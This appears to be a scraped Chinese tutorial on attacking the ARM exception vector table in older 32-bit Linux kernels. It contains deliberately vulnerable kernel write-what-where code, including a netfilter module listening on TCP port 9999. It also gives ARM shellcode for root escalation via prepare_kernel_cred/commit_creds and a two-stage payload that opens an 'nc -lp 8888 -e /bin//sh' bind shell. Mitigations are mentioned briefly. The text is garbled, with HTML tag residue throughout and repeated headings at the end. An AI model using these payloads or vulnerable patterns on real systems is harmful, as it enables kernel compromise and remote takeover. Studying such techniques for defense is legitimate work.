ARM异常向量表(EVT)攻击技术详解<\/h1>

1. ARM异常向量表概述<\/h2>
ARM异常向量表(Event Vector Table, EVT)是ARM架构中类似于x86架构中IDT(中断描述符表)的机制。当ARM处理器发生异常时，CPU会停止当前指令的执行，并将控制权转移到对应的异常处理程序。<\/p>

1.1 ARM异常类型与模式<\/h3>

ARM架构定义了7种异常类型，每种异常对应特定的处理器模式：<\/p>

异常类型<\/th> 处理器模式<\/th> 描述<\/th> <\/tr> <\/thead>

快速中断请求(FIQ)<\/td> FIQ模式<\/td> 需要快速响应和低延迟的中断<\/td> <\/tr>

中断请求(IRQ)<\/td> IRQ模式<\/td> 通用中断处理<\/td> <\/tr>

软件中断或重置<\/td> 管理员模式(SVC)<\/td> 操作系统的保护模式<\/td> <\/tr>

预读取或数据终止<\/td> 终止模式(Abort)<\/td> 访问无效\/无格式内存时触发<\/td> <\/tr>

未定义指令<\/td>

未定义模式(Undef)<\/td>

执行未定义指令时触发<\/td> <\/tr> <\/tbody> <\/table>

此外还有用户模式(普通程序执行)和系统模式(特权用户模式)。<\/p>

1.2 异常向量表结构<\/h3>

在32位ARM Linux系统中，异常向量表位于固定地址0xffff0000<\/code>，包含8个条目，每个条目4字节：<\/p>

异常类型<\/th>	偏移量<\/th>	地址<\/th> <\/tr> <\/thead>
重置<\/td>	0x0<\/td>	0xffff0000<\/td> <\/tr>
未定义指令<\/td>	0x4<\/td>	0xffff0004<\/td> <\/tr>
软件中断(SWI)<\/td>	0x8<\/td>	0xffff0008<\/td> <\/tr>
预读取终止<\/td>	0xc<\/td>	0xffff000c<\/td> <\/tr>
数据终止<\/td>	0x10<\/td>	0xffff0010<\/td> <\/tr>
保留<\/td>	0x14<\/td>	0xffff0014<\/td> <\/tr>
IRQ<\/td>	0x18<\/td>	0xffff0018<\/td> <\/tr>
FIQ<\/td>	0x1c<\/td>	0xffff001c<\/td> <\/tr> <\/tbody> <\/table> 2. EVT攻击原理<\/h2> EVT之所以成为攻击目标，是因为：<\/p> 位于内存中固定已知地址(`0xffff0000<\/code>)<\/li>` `在传统Linux内核中是可写且可执行的<\/li>` 每个异常处理程序的偏移量固定且已知<\/li> <\/ol> 2.1 攻击可行性分析<\/h3> 攻击者可以通过以下方式利用EVT：<\/p> 覆盖异常向量表中的条目，使其指向攻击者控制的代码<\/li> 利用软件中断(SWI)向量特别有效，因为：所有系统调用都通过SWI向量<\/li> 在进程上下文中执行<\/li> 可以访问进程寄存器状态<\/li> <\/ul> <\/li> <\/ol> 2.2 攻击前提条件<\/h3> 成功实施EVT攻击需要：<\/p> 存在任意地址写入漏洞(what-where原语)<\/li> 知道内核内存布局(地址信息)<\/li> 目标系统未对EVT实施写保护<\/li> <\/ol> 3. 本地攻击实例<\/h2> 3.1 漏洞模块分析<\/h3> 示例中使用一个有任意写入漏洞的字符设备：<\/p> static<\/span> ssize_t on_write<\/span>(struct<\/span> file <\/span>filp, const<\/span> char<\/span> <\/span>buff, <\/span><\/span> size_t len, loff_t <\/span>off) { <\/span><\/span> size_t siz =<\/span> len; <\/span><\/span> void<\/span> <\/span>where =<\/span> NULL; <\/span><\/span> char<\/span> <\/span>what =<\/span> NULL; <\/span><\/span> <\/span><\/span> if<\/span>(siz ><\/span> sizeof<\/span>(where)) <\/span><\/span> what =<\/span> buff +<\/span> sizeof<\/span>(where); <\/span><\/span> else<\/span> <\/span><\/span> goto<\/span> end; <\/span><\/span> <\/span><\/span> copy_from_user(&<\/span>where, buff, sizeof<\/span>(where)); <\/span><\/span> memcpy(where, what, sizeof<\/span>(void<\/span> <\/span>)); <\/span><\/span> <\/span><\/span>end: <\/span><\/span> return<\/span> siz; <\/span><\/span>} <\/span><\/span><\/code><\/pre>该漏洞允许攻击者指定任意地址并在该地址写入任意数据。<\/p> 3.2 攻击步骤<\/h3> 存储后门代码<\/strong>：将shellcode存储在0xffff0020<\/code>(EVT附近空闲区域)<\/li> 覆盖SWI向量<\/strong>：修改0xffff0008<\/code>处的SWI向量，使其跳转到shellcode<\/li> 触发执行<\/strong>：通过系统调用触发shellcode执行<\/li> <\/ol> 3.3 后门shellcode示例<\/h3> ; 检查magic值 <\/span><\/span><\/span><\/span>cmp<\/span> r7<\/span>, #0xb0000000 <\/span><\/span><\/span><\/span>bne<\/span> exit<\/span> <\/span><\/span> <\/span><\/span>elevate: <\/span><\/span> stmfd<\/span> sp<\/span>!,{<\/span>r0-r12<\/span>}<\/span> <\/span><\/span> mov<\/span> r0<\/span>, #0 <\/span><\/span><\/span><\/span> ldr<\/span> r3<\/span>, =<\/span>0xc0049a00<\/span> ; prepare_kernel_cred <\/span><\/span><\/span><\/span> blx<\/span> r3<\/span> <\/span><\/span> ldr<\/span> r4<\/span>, =<\/span>0xc0049438<\/span> ; commit_creds <\/span><\/span><\/span><\/span> blx<\/span> r4<\/span> <\/span><\/span> ldmfd<\/span> sp<\/span>!, {<\/span>r0-r12<\/span>, pc<\/span>}^<\/span> ; 返回用户空间 <\/span><\/span><\/span><\/span> <\/span><\/span>exit: <\/span><\/span> ldr<\/span> pc<\/span>, [pc<\/span>, #980] ; 跳转到正常SWI处理程序 <\/span><\/span><\/span><\/code><\/pre>该shellcode会检查r7寄存器中的magic值，若匹配则提升当前进程权限。<\/p> 4. 远程攻击实例<\/h2> 4.1 漏洞模块分析<\/h3> 使用存在漏洞的netfilter模块：<\/p> if<\/span>(ip-><\/span>protocol ==<\/span> IPPROTO_TCP) { <\/span><\/span> tcp =<\/span> (struct<\/span> tcphdr <\/span>)(skb_network_header(skb) +<\/span> ip_hdrlen(skb)); <\/span><\/span> currport =<\/span> ntohs(tcp-><\/span>dest); <\/span><\/span> if<\/span>((currport ==<\/span> 9999<\/span>)) { <\/span><\/span> tcp_data =<\/span> (char<\/span> <\/span>)((unsigned<\/span> char<\/span> <\/span>)tcp +<\/span> (tcp-><\/span>doff <\/span> 4<\/span>)); <\/span><\/span> where =<\/span> ((void<\/span> *<\/span>)tcp_data)[0<\/span>]; <\/span><\/span> len =<\/span> ((uint8_t<\/span> <\/span>)(tcp_data +<\/span> sizeof<\/span>(where)))[0<\/span>]; <\/span><\/span> what =<\/span> tcp_data +<\/span> sizeof<\/span>(where) +<\/span> sizeof<\/span>(len); <\/span><\/span> memcpy(where, what, len); <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>该模块监听TCP 9999端口，允许远程攻击者向任意地址写入数据。<\/p> 4.2 两阶段攻击方案<\/h3> 第一阶段<\/strong>：存储两段shellcode到0xffff0020<\/code><\/li> 覆盖SWI向量<\/strong>：修改0xffff0008<\/code>指向第一阶段shellcode<\/li> 执行流程<\/strong>：系统调用触发第一阶段代码<\/li> 第一阶段设置返回地址为第二阶段shellcode<\/li> 返回用户空间执行第二阶段(bind shell)<\/li> <\/ul> <\/li> <\/ol> 4.3 两阶段shellcode示例<\/h3> 第一阶段shellcode<\/strong>:<\/p> stage_1: <\/span><\/span> adr<\/span> lr<\/span>, stage_2<\/span> <\/span><\/span> push<\/span> {<\/span>lr<\/span>}<\/span> <\/span><\/span> stmfd<\/span> sp<\/span>!, {<\/span>r0-r12<\/span>}<\/span> <\/span><\/span> ldr<\/span> r0<\/span>, =<\/span>0xe59ff410<\/span> ; 原始SWI向量值 <\/span><\/span><\/span><\/span> ldr<\/span> r1<\/span>, =<\/span>0xffff0008<\/span> <\/span><\/span> str<\/span> r0<\/span>, [r1<\/span>] ; 恢复原始SWI向量 <\/span><\/span><\/span><\/span> ldmfd<\/span> sp<\/span>!, {<\/span>r0-r12<\/span>, pc<\/span>}^<\/span> ; 返回到stage_2 <\/span><\/span><\/span><\/code><\/pre>第二阶段shellcode<\/strong>(bind shell):<\/p> stage_2: <\/span><\/span> ldr<\/span> r0<\/span>, =<\/span>0x6e69622f<\/span> ; \/bin <\/span><\/span><\/span><\/span> ldr<\/span> r1<\/span>, =<\/span>0x68732f2f<\/span> ; \/sh <\/span><\/span><\/span><\/span> eor<\/span> r2<\/span>, r2<\/span>, r2<\/span> ; NULL <\/span><\/span><\/span><\/span> push<\/span> {<\/span>r0<\/span>, r1<\/span>, r2<\/span>}<\/span> <\/span><\/span> mov<\/span> r0<\/span>, sp<\/span> <\/span><\/span> ldr<\/span> r4<\/span>, =<\/span>0x0000632d<\/span> ; -c\x00\x00 <\/span><\/span><\/span><\/span> push<\/span> {<\/span>r4<\/span>}<\/span> <\/span><\/span> mov<\/span> r4<\/span>, sp<\/span> <\/span><\/span> ; 设置nc -lp 8888 -e \/bin\/\/sh参数 <\/span><\/span><\/span><\/span> ; ...(省略部分参数设置代码) <\/span><\/span><\/span><\/span> mov<\/span> r1<\/span>, sp<\/span> <\/span><\/span> mov<\/span> r7<\/span>, #11 ; execve系统调用号 <\/span><\/span><\/span><\/span> swi<\/span> 0x0<\/span> <\/span><\/span><\/code><\/pre>5. 防御措施与限制<\/h2> 现代内核保护<\/strong>：<\/p> 将EVT映射为只读(grsec\/Pax)<\/li> 内核地址空间布局随机化(KASLR)<\/li> <\/ul> <\/li> 攻击限制<\/strong>：<\/p> 需要知道内核地址信息<\/li> 依赖EVT可写特性(新内核可能已修复)<\/li> 存储shellcode的位置可能被其他内核使用<\/li> <\/ul> <\/li> 缓解建议<\/strong>：<\/p> 启用内核写保护<\/li> 使用最新内核版本<\/li> 实施完整的SMEP\/SMAP保护<\/li> <\/ul> <\/li> <\/ol> 6. 扩展攻击思路<\/h2> 中断堆栈溢出<\/strong>：中断堆栈通常位于EVT附近，可能存在溢出利用可能<\/li> 多阶段攻击<\/strong>：结合其他漏洞实现更复杂的攻击链<\/li> 持久化后门<\/strong>：将shellcode存储在不会被覆盖的内核区域<\/li> <\/ol> 7. 总结<\/h2> ARM异常向量表攻击是一种利用内核任意写入漏洞修改异常处理流程的技术。通过覆盖SWI等关键异常向量，攻击者可以实现本地权限提升或远程代码执行。虽然现代内核已增加保护措施，但理解这种攻击技术对于内核安全研究和防御策略制定仍有重要意义。<\/p>

ARM异常向量表(EVT)攻击技术详解<\/h1>

1. ARM异常向量表概述<\/h2> ARM异常向量表(Event Vector Table, EVT)是ARM架构中类似于x86架构中IDT(中断描述符表)的机制。当ARM处理器发生异常时，CPU会停止当前指令的执行，并将控制权转移到对应的异常处理程序。<\/p>

3. 本地攻击实例<\/h2>

4. 远程攻击实例<\/h2>

1. ARM异常向量表概述<\/h2>
ARM异常向量表(Event Vector Table, EVT)是ARM架构中类似于x86架构中IDT(中断描述符表)的机制。当ARM处理器发生异常时，CPU会停止当前指令的执行，并将控制权转移到对应的异常处理程序。<\/p>